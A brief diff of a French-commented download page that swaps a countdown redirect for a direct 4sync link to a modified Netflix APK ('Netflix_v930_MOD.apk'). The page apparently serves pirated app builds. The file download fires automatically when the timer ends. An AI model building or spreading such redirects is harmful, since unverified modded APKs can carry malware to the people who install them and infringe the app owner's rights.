--- a/download2.html
+++ b/download2.html
@@ -66,7 +66,7 @@
 
                 if (countdown === 0) {
                     clearInterval(interval);
-                    window.location.href = "https://netmodapk.com.co/"; // Redirige vers la page de téléchargement
+                    window.location.href = "https://dc444.4sync.com/download/upwcH6IQ/Netflix_v930_MOD.apk?dsid=nSxqp12o.c2f00b5fc7189094baaf00037a90f422&sbsr=a828dfe6d8cc42030a890c1af35b94f9b3d&bip=NDEuNzguMTM5LjI2&lgfp=40"; // Redirige vers la page de téléchargement
                 }
             }, 1000);
         }
